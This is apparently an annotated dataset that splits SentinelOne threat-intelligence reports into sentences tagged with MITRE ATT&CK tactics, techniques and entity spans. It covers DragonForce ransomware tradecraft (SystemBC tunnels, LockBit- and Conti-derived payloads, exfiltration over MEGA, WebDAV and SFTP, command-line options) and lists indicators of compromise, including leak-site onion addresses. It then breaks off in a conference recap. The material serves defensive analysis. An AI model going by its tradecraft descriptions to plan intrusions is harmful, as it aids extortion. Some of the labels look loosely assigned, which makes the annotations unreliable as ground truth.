"uid": "sentinel-69_SentinelOne_report-p1-s14-ac90b2", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 14, "context_before": "Ivanti Connect Secure and Policy Secure Authentication Bypass CVE-2024-21412 – Microsoft Windows SmartScreen Security Feature Bypass CVE-2024-21887 – Ivanti Connect Secure and Policy Secure Command Injection CVE-2024-21893 – Ivanti Connect Secure and Policy Secure Path Traversal Additionally, DragonForce operators have been observed deploying the SystemBC backdoor for persistence.", "sentence_text": "SystemBC is a multi-platform proxying malware adopted by numerous threat actors to create SOCKS5 tunnels through victim networks.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Use of SystemBC to create SOCKS5 proxy tunnels in victim networks", "entities": [ { "text": "numerous threat actors", "start": 57, "end": 79, "label": "ThreatActor" }, { "text": "SystemBC", "start": 0, "end": 8, "label": "MalwareTool" }, { "text": "SOCKS5 tunnels", "start": 90, "end": 104, "label": "Infrastructure_Indicator" }, { "text": "create SOCKS5 tunnels through victim networks.", "start": 83, "end": 129, "label": "Action" } ] }, { "uid": "sentinel-69_SentinelOne_report-p1-s15-5bf584", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 15, "context_before": "SystemBC is a multi-platform proxying malware adopted by numerous threat actors to create SOCKS5 tunnels through victim networks.", "sentence_text": "Ransomware Payloads\nInitially, DragonForce ransomware payloads were based entirely on the leaked LockBit (LockBit 3.0/Black) builder.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Development of ransomware payloads using leaked LockBit builder", "entities": [ { "text": " DragonForce", "start": 30, "end": 42, "label": "ThreatActor" }, { "text": "DragonForce ransomware payloads ", "start": 31, "end": 63, "label": "MalwareTool" }, { "text": "LockBit (LockBit 3.0/Black) builder", "start": 97, "end": 132, "label": "MalwareTool" }, { "text": "based entirely on the leaked LockBit (LockBit 3.0/Black) builder.", "start": 68, "end": 133, "label": "Action" } ] }, { "uid": "sentinel-69_SentinelOne_report-p1-s16-b5f4d7", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 16, "context_before": "Ransomware Payloads\nInitially, DragonForce ransomware payloads were based entirely on the leaked LockBit (LockBit 3.0/Black) builder.", "sentence_text": "In common with other hacktivist / RaaS groups , early DragonForce operations relied on leaked code and tools that were readily available.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Use of leaked code and readily available tools for operations", "entities": [ { "text": "DragonForce", "start": 54, "end": 65, "label": "ThreatActor" }, { "text": "leaked code and tools", "start": 87, "end": 108, "label": "MalwareTool" }, { "text": "relied on leaked code and tools", "start": 77, "end": 108, "label": "Action" } ] }, { "uid": "sentinel-69_SentinelOne_report-p1-s17-3c6998", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 17, "context_before": "In common with other hacktivist / RaaS groups , early DragonForce operations relied on leaked code and tools that were readily available.", "sentence_text": "The group has since evolved its own branded ransomware, updating the source and producing a more bespoke offshoot with roots in the Conti v3 codebase.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Developed and customized ransomware based on existing code", "entities": [ { "text": "The group", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": "branded ransomware,", "start": 36, "end": 55, "label": "MalwareTool" }, { "text": " Conti v3 codebase.", "start": 131, "end": 150, "label": "MalwareTool" }, { "text": "evolved its own branded ransomware, updating the source and producing a more bespoke offshoot", "start": 20, "end": 113, "label": "Action" } ] }, { "uid": "sentinel-69_SentinelOne_report-p1-s18-f09921", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 18, "context_before": "The group has since evolved its own branded ransomware, updating the source and producing a more bespoke offshoot with roots in the Conti v3 codebase.", "sentence_text": "Basic encryption features and ‘under the hood’ functionality remain unchanged, with AES used for primary file encryption and RSA for securing the keys themselves.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Encrypt files using AES and secure encryption keys using RSA", "entities": [ { "text": "AES", "start": 84, "end": 87, "label": "MalwareTool" }, { "text": "RSA", "start": 125, "end": 128, "label": "MalwareTool" }, { "text": "AES used for primary file encryption and RSA for securing the keys themselves.", "start": 84, "end": 162, "label": "Action" } ] }, { "uid": "sentinel-69_SentinelOne_report-p1-s19-5043f4", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 19, "context_before": "Basic encryption features and ‘under the hood’ functionality remain unchanged, with AES used for primary file encryption and RSA for securing the keys themselves.", "sentence_text": "More recently built Conti-derived samples use the ChaCha8 algorithm, which is touted as providing improved speed over the AES encryption used in the LockBit derived variants.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Use ChaCha8 algorithm for file encryption", "entities": [ { "text": "Conti-derived samples", "start": 20, "end": 41, "label": "MalwareTool" }, { "text": " use the ChaCha8 algorithm", "start": 41, "end": 67, "label": "Action" } ] }, { "uid": "sentinel-69_SentinelOne_report-p1-s20-d1fe9e", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 20, "context_before": "More recently built Conti-derived samples use the ChaCha8 algorithm, which is touted as providing improved speed over the AES encryption used in the LockBit derived variants.", "sentence_text": "DragonForce affiliates are provided a robust set of tools within the affiliate panel for building payloads and managing campaigns.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Use affiliate panel tools to build payloads and manage campaigns", "entities": [ { "text": "DragonForce affiliates", "start": 0, "end": 22, "label": "ThreatActor" }, { "text": "affiliate panel", "start": 69, "end": 84, "label": "MalwareTool" }, { "text": "building payloads and managing campaigns.", "start": 89, "end": 130, "label": "Action" } ] }, { "uid": "sentinel-69_SentinelOne_report-p1-s21-2f8dda", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 21, "context_before": "DragonForce affiliates are provided a robust set of tools within the affiliate panel for building payloads and managing campaigns.", "sentence_text": "Each affiliate has the ability to manage multiple builds per-platform for each victim.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Manage multiple malware builds per-platform for victims", "entities": [ { "text": "Each affiliate", "start": 0, "end": 14, "label": "ThreatActor" }, { "text": "builds per-platform", "start": 50, "end": 69, "label": "MalwareTool" }, { "text": "manage multiple builds per-platform for each victim.", "start": 34, "end": 86, "label": "Action" } ] }, { "uid": "sentinel-69_SentinelOne_report-p1-s22-81fa6d", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 22, "context_before": "Each affiliate has the ability to manage multiple builds per-platform for each victim.", "sentence_text": "Additionally, DragonForce payloads support multiple command-line options:\nDragonForce operators utilize multiple tactics and services for data exfiltration.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Data exfiltration using DragonForce payloads", "entities": [ { "text": "DragonForce operators", "start": 74, "end": 95, "label": "ThreatActor" }, { "text": "DragonForce payloads", "start": 14, "end": 34, "label": "MalwareTool" }, { "text": "multiple tactics and services", "start": 104, "end": 133, "label": "Infrastructure_Indicator" }, { "text": "utilize multiple tactics and services for data exfiltration.", "start": 96, "end": 156, "label": "Action" } ] }, { "uid": "sentinel-69_SentinelOne_report-p1-s23-cde3be", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 23, "context_before": "Additionally, DragonForce payloads support multiple command-line options:\nDragonForce operators utilize multiple tactics and services for data exfiltration.", "sentence_text": "This includes the use of MEGA, but also Living Off the Land ( LOTL ) methods like basic WebDAV and SFTP transfers to remote servers.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1567", "name": "Exfiltration Over Web Service" }, { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Data exfiltration using MEGA, WebDAV, and SFTP", "entities": [ { "text": "MEGA", "start": 25, "end": 29, "label": "Infrastructure_Indicator" }, { "text": "WebDAV", "start": 88, "end": 94, "label": "Infrastructure_Indicator" }, { "text": "SFTP", "start": 99, "end": 103, "label": "Infrastructure_Indicator" }, { "text": "remote servers.", "start": 117, "end": 132, "label": "Infrastructure_Indicator" }, { "text": "use of MEGA, but also Living Off the Land ( LOTL ) methods like basic WebDAV and SFTP transfers", "start": 18, "end": 113, "label": "Action" } ] }, { "uid": "sentinel-69_SentinelOne_report-p1-s24-d41d24", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 24, "context_before": "This includes the use of MEGA, but also Living Off the Land ( LOTL ) methods like basic WebDAV and SFTP transfers to remote servers.", "sentence_text": "Updated ‘White-label’ Branding In early 2025, DragonForce introduced a ‘white-label’ branding service that allows affiliates to disguise the DragonForce ransomware as a different strain for an additional fee.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Ransomware obfuscation / rebranding for affiliates", "entities": [ { "text": " DragonForce", "start": 45, "end": 57, "label": "ThreatActor" }, { "text": "DragonForce ransomware ", "start": 141, "end": 164, "label": "MalwareTool" }, { "text": "to disguise the DragonForce ransomware as a different strain for an additional fee.", "start": 125, "end": 208, "label": "Action" } ] }, { "uid": "sentinel-69_SentinelOne_report-p1-s25-5aa84c", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 25, "context_before": "Updated ‘White-label’ Branding In early 2025, DragonForce introduced a ‘white-label’ branding service that allows affiliates to disguise the DragonForce ransomware as a different strain for an additional fee.", "sentence_text": "This also came alongside the announcement of the RansomBay service and portals.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Deployment of ransomware-as-a-service infrastructure", "entities": [ { "text": "RansomBay service", "start": 49, "end": 66, "label": "MalwareTool" }, { "text": "portals.", "start": 71, "end": 79, "label": "Infrastructure_Indicator" }, { "text": "announcement of the RansomBay service and portals.", "start": 29, "end": 79, "label": "Action" } ] }, { "uid": "sentinel-69_SentinelOne_report-p1-s26-120fa3", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 26, "context_before": "This also came alongside the announcement of the RansomBay service and portals.", "sentence_text": "This enables enterprising threat actors to launch seemingly unique ransomware operations, while leveraging DragonForce’s infrastructure and code.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Use of DragonForce infrastructure and code to conduct ransomware operations", "entities": [ { "text": "enterprising threat actors", "start": 13, "end": 39, "label": "ThreatActor" }, { "text": " code.", "start": 139, "end": 145, "label": "MalwareTool" }, { "text": "DragonForce’s infrastructure", "start": 107, "end": 135, "label": "Infrastructure_Indicator" }, { "text": "launch seemingly unique ransomware operations", "start": 43, "end": 88, "label": "Action" } ] }, { "uid": "sentinel-69_SentinelOne_report-p1-s27-1c3ecb", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 27, "context_before": "This enables enterprising threat actors to launch seemingly unique ransomware operations, while leveraging DragonForce’s infrastructure and code.", "sentence_text": "For the developers, this offering allows DragonForce to profit from attacks by affiliates without having the brand tied to the attack or specific operators.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" }, { "id": "T1587.002", "name": "Code Signing Certificates" } ], "procedure": "Monetize attacks performed by affiliates", "entities": [ { "text": " DragonForce", "start": 40, "end": 52, "label": "ThreatActor" }, { "text": " profit from attacks by affiliates", "start": 55, "end": 89, "label": "Action" } ] }, { "uid": "sentinel-69_SentinelOne_report-p1-s28-6893d8", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 28, "context_before": "For the developers, this offering allows DragonForce to profit from attacks by affiliates without having the brand tied to the attack or specific operators.", "sentence_text": "This is similar to moves that operations like RansomHub , Rabbit Hole and Dispossessor have previously attempted.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s29-10f22e", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 29, "context_before": "This is similar to moves that operations like RansomHub , Rabbit Hole and Dispossessor have previously attempted.", "sentence_text": "All of this points to DragonForce seriously expanding its goals and operations.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Expanding operational scope and capabilities", "entities": [ { "text": " DragonForce", "start": 21, "end": 33, "label": "ThreatActor" }, { "text": "expanding its goals and operations.", "start": 44, "end": 79, "label": "Action" } ] }, { "uid": "sentinel-69_SentinelOne_report-p1-s30-ed38f7", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 30, "context_before": "All of this points to DragonForce seriously expanding its goals and operations.", "sentence_text": "The\nprotects against DragonForce Ransomware and associated malicious behaviors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s31-da37b3", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 31, "context_before": "The\nprotects against DragonForce Ransomware and associated malicious behaviors.", "sentence_text": "In addition to detection via SentinelOne’s real-time endpoint protection capabilities, DragonForce can also be detected by enabling Platform Detection rules (details also available via the customer support portal).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s32-2ca8aa", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 32, "context_before": "In addition to detection via SentinelOne’s real-time endpoint protection capabilities, DragonForce can also be detected by enabling Platform Detection rules (details also available via the customer support portal).", "sentence_text": "Conclusion\nWhile DragonForce continues to blur the line between hacktivism and financial motivation, its recent targeting suggests the group is increasingly motivated by financial rewards.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s33-908198", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 33, "context_before": "Conclusion\nWhile DragonForce continues to blur the line between hacktivism and financial motivation, its recent targeting suggests the group is increasingly motivated by financial rewards.", "sentence_text": "Although DragonForce’s large-scale cartel model is not the first of its kind, its current successes and the recent demise of rival operations suggest that it will become increasingly attractive both to orphaned ransomware actors and more resourced groups looking to thrive in an increasingly competitive space.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s34-2d715e", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 34, "context_before": "Although DragonForce’s large-scale cartel model is not the first of its kind, its current successes and the recent demise of rival operations suggest that it will become increasingly attractive both to orphaned ransomware actors and more resourced groups looking to thrive in an increasingly competitive space.", "sentence_text": "The wave of attacks against UK businesses in recent weeks highlights the ongoing need for strong cybersecurity practices and policies, along with well-developed incident response procedures.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s35-3623ec", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 35, "context_before": "The wave of attacks against UK businesses in recent weeks highlights the ongoing need for strong cybersecurity practices and policies, along with well-developed incident response procedures.", "sentence_text": "Keeping defenses up to date, properly and efficiently configured is critical.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s36-dd2beb", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 36, "context_before": "Keeping defenses up to date, properly and efficiently configured is critical.", "sentence_text": "Full and contextual visibility into resources and assets is also key in defending against modern ransomware and extortion operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s37-180372", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 37, "context_before": "Full and contextual visibility into resources and assets is also key in defending against modern ransomware and extortion operations.", "sentence_text": "Indicators of Compromise SHA1 Ransom Notes 343220b0e37841dc002407860057eb10dbeea94d ae2967d021890a6a2a8c403a569b9e6d56e03abd c98e394a3e33c616d251d426fc986229ede57b0f f710573c1d18355ecdf3131aa69a6dfe8e674758 SHA1 Payloads 011894f40bab6963133d46a1976fa587a4b66378 0b22b6e5269ec241b82450a7e65009685a3010fb 196c08fbab4119d75afb209a05999ce269ffe3cf 1f5ae3b51b2dbf9419f4b7d51725a49023abc81c 229e073dbcbb72bdfee2c244e5d066ad949d2582 29baab2551064fa30fb18955ccc8f332bd68ddd4 577b110a8bfa6526b21bb728e14bd6494dc67f71 7db52047c72529d27a39f2e1a9ffb8f1f0ddc774 81185dd73f2e042a947a1bf77f429de08778b6e9 a4bdd6cef0ed43a4d08f373edc8e146bb15ca0f9 b3e0785dbe60369634ac6a6b5d241849c1f929de b571e60a6d2d9ab78da1c14327c0d26f34117daa bcfac98117d9a52a3196a7bd041b49d5ff0cfb8c e164bbaf848fa5d46fa42f62402a1c55330ef562", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s38-d0380f", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 38, "context_before": "Indicators of Compromise SHA1 Ransom Notes 343220b0e37841dc002407860057eb10dbeea94d ae2967d021890a6a2a8c403a569b9e6d56e03abd c98e394a3e33c616d251d426fc986229ede57b0f f710573c1d18355ecdf3131aa69a6dfe8e674758 SHA1 Payloads 011894f40bab6963133d46a1976fa587a4b66378 0b22b6e5269ec241b82450a7e65009685a3010fb 196c08fbab4119d75afb209a05999ce269ffe3cf 1f5ae3b51b2dbf9419f4b7d51725a49023abc81c 229e073dbcbb72bdfee2c244e5d066ad949d2582 29baab2551064fa30fb18955ccc8f332bd68ddd4 577b110a8bfa6526b21bb728e14bd6494dc67f71 7db52047c72529d27a39f2e1a9ffb8f1f0ddc774 81185dd73f2e042a947a1bf77f429de08778b6e9 a4bdd6cef0ed43a4d08f373edc8e146bb15ca0f9 b3e0785dbe60369634ac6a6b5d241849c1f929de b571e60a6d2d9ab78da1c14327c0d26f34117daa bcfac98117d9a52a3196a7bd041b49d5ff0cfb8c e164bbaf848fa5d46fa42f62402a1c55330ef562", "sentence_text": "e1c0482b43fe57c93535119d085596cd2d90560a eada05f4bfd4876c57c24cd4b41f7a40ea97274c fc75a3800d8c2fa49b27b632dc9d7fb611b65201 Victim Portals and Data Leak Sites 3pktcrcbmssvrnwe5skburdwe2h3v6ibdnn5kbjqihsg6eu6s6b7ryqd[.]onion Ijbw7iiyodqzpg6ooewbgn6mv2pinoer3k5pzdecoejsw5nyoe73zvad[.]onion Kfgjwkho24xiwckcf53x7qyruobbkhx4eqn2c6oe4hprbn23rcp6qcqd[.]onion Rnc6scfbqslz5aqxfg5hrjel5qomxsclltc6jvhahi6qwt7op5qc7iad[.]onion rrrbay3nf4c2wxmhprc6eotjlpqkeowfuobodic4x4nzqtosx3ebirid[.]onion rrrbayguhgtgxrdg5myxkdc2cxei25u6brknfqkl3a35nse7f2arblyd[.]onion rrrbaygxp3f2qtgvfqk6ffhdrm24ucxvbr6mhxsga4faefqyd77w7tqd[.]onion Z3wqggtxft7id3ibr7srivv5gjof5fwg76slewnzwwakjuf3nlhukdid[.]onion Social Media TOXID:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s39-4f1f55", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 39, "context_before": "e1c0482b43fe57c93535119d085596cd2d90560a eada05f4bfd4876c57c24cd4b41f7a40ea97274c fc75a3800d8c2fa49b27b632dc9d7fb611b65201 Victim Portals and Data Leak Sites 3pktcrcbmssvrnwe5skburdwe2h3v6ibdnn5kbjqihsg6eu6s6b7ryqd[.]onion Ijbw7iiyodqzpg6ooewbgn6mv2pinoer3k5pzdecoejsw5nyoe73zvad[.]onion Kfgjwkho24xiwckcf53x7qyruobbkhx4eqn2c6oe4hprbn23rcp6qcqd[.]onion Rnc6scfbqslz5aqxfg5hrjel5qomxsclltc6jvhahi6qwt7op5qc7iad[.]onion rrrbay3nf4c2wxmhprc6eotjlpqkeowfuobodic4x4nzqtosx3ebirid[.]onion rrrbayguhgtgxrdg5myxkdc2cxei25u6brknfqkl3a35nse7f2arblyd[.]onion rrrbaygxp3f2qtgvfqk6ffhdrm24ucxvbr6mhxsga4faefqyd77w7tqd[.]onion Z3wqggtxft7id3ibr7srivv5gjof5fwg76slewnzwwakjuf3nlhukdid[.]onion Social Media TOXID:", "sentence_text": "1C054B722BCBF41A918EF3C485712742088F5C3E81B2FDD91ADEA6BA55F4A856D90A65E99D20 TOXID: 258C79F73CCC1E56863030CD02C2C7C4347F80CAD43DD6A5B219A618FD17853C7BB1029DAE31 Singularity™ Platform Singularity™ enables unfettered visibility, industry-leading detection, and autonomous response.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s40-b98000", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 40, "context_before": "1C054B722BCBF41A918EF3C485712742088F5C3E81B2FDD91ADEA6BA55F4A856D90A65E99D20 TOXID: 258C79F73CCC1E56863030CD02C2C7C4347F80CAD43DD6A5B219A618FD17853C7BB1029DAE31 Singularity™ Platform Singularity™ enables unfettered visibility, industry-leading detection, and autonomous response.", "sentence_text": "Discover the power of AI-powered, enterprise-wide cybersecurity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s41-d4de0c", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 41, "context_before": "Discover the power of AI-powered, enterprise-wide cybersecurity.", "sentence_text": "Request a Demo Like this article?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s42-b01bae", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 42, "context_before": "Request a Demo Like this article?", "sentence_text": "Unearthed Read More Get a demo", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s43-e75c78", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 43, "context_before": "Unearthed Read More Get a demo", "sentence_text": "Defeat every attack, at every stage of the threat lifecycle with SentinelOne Book a demo and see the world’s most advanced cybersecurity platform in action.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s44-ffacb9", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 44, "context_before": "Defeat every attack, at every stage of the threat lifecycle with SentinelOne Book a demo and see the world’s most advanced cybersecurity platform in action.", "sentence_text": "Get Demo\nSentinelLabs\nSentinelLabs: Threat Intel & Malware Analysis", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s45-d7a80b", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 45, "context_before": "Get Demo\nSentinelLabs\nSentinelLabs: Threat Intel & Malware Analysis", "sentence_text": "We are hunters, reversers, exploit developers, & tinkerers shedding light on the vast world of malware, exploits, APTs, & cybercrime across all platforms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s46-d2713f", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 46, "context_before": "We are hunters, reversers, exploit developers, & tinkerers shedding light on the vast world of malware, exploits, APTs, & cybercrime across all platforms.", "sentence_text": "VISIT SITE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s47-a50e8e", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 47, "context_before": "VISIT SITE", "sentence_text": "[FILTERED_TABLES_START]\n-vmsvc | Force run in ESXi vim-cmd discovery mode -n | Do not perform encryption/decryption (file discovery only)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-69_SentinelOne_report-p1-s48-3a5fa8", "source": "sentinel", "doc_id": "69_SentinelOne_report", "page_number": 1, "sentence_id": 48, "context_before": "[FILTERED_TABLES_START]\n-vmsvc | Force run in ESXi vim-cmd discovery mode -n | Do not perform encryption/decryption (file discovery only)", "sentence_text": "-p PATH | Override file-system paths for discovery", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s1-945362", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "LABScon24 Highlights | Examining The Latest in Cybersecurity Trends & Challenges", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s2-ecd95f", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "LABScon24 Highlights | Examining The Latest in Cybersecurity Trends & Challenges", "sentence_text": "From exploring the latest in techniques, exploits, and tooling to uncovering the tracks of today’s threat actors, we’re looking back on three-days’ worth of deep dives and open discourse with the lens focused on how to keep pushing the needle on our adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s3-b9c890", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "From exploring the latest in techniques, exploits, and tooling to uncovering the tracks of today’s threat actors, we’re looking back on three-days’ worth of deep dives and open discourse with the lens focused on how to keep pushing the needle on our adversaries.", "sentence_text": "We won’t hold out on what we learned, so make sure you follow our ongoing LABScon Replay series where we showcase all of the talk tracks presented from the event in a lead-up to next year’s conference.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s4-87d105", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "We won’t hold out on what we learned, so make sure you follow our ongoing LABScon Replay series where we showcase all of the talk tracks presented from the event in a lead-up to next year’s conference.", "sentence_text": "Keynote Insights | The Consolation of Threat Intel & The Complexities of Ransomware Dynamics This year’s formative speech by SentinelLabs’", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s5-b580ef", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 5, "context_before": "Keynote Insights | The Consolation of Threat Intel & The Complexities of Ransomware Dynamics This year’s formative speech by SentinelLabs’", "sentence_text": "AVP Juan Andrés Guerrero-Saade highlights the challenges facing the current state of threat intelligence while urging for a critical discussion about its purpose and direction.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s6-3c2b99", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 6, "context_before": "AVP Juan Andrés Guerrero-Saade highlights the challenges facing the current state of threat intelligence while urging for a critical discussion about its purpose and direction.", "sentence_text": "As we explore a growing sense of disenfranchisement felt by many professionals in the cybersecurity community, there is a lack of meaningful impact, and the growing disconnect within the field.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s7-466d21", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 7, "context_before": "As we explore a growing sense of disenfranchisement felt by many professionals in the cybersecurity community, there is a lack of meaningful impact, and the growing disconnect within the field.", "sentence_text": "Juan Andrés also emphasized the importance of redefining the value of cyber threat intelligence (CTI) and reinvigorating the industry to make sure that CTI not only meets its intended goals but also empowers its professionals.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s8-f2d549", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 8, "context_before": "Juan Andrés also emphasized the importance of redefining the value of cyber threat intelligence (CTI) and reinvigorating the industry to make sure that CTI not only meets its intended goals but also empowers its professionals.", "sentence_text": "We’re still stuck on the plumbing.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s9-0fdce4", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 9, "context_before": "We’re still stuck on the plumbing.”", "sentence_text": "He outlined the so-called “ransomware paradox,” which highlights how ransomware groups are differentiating themselves from traditional 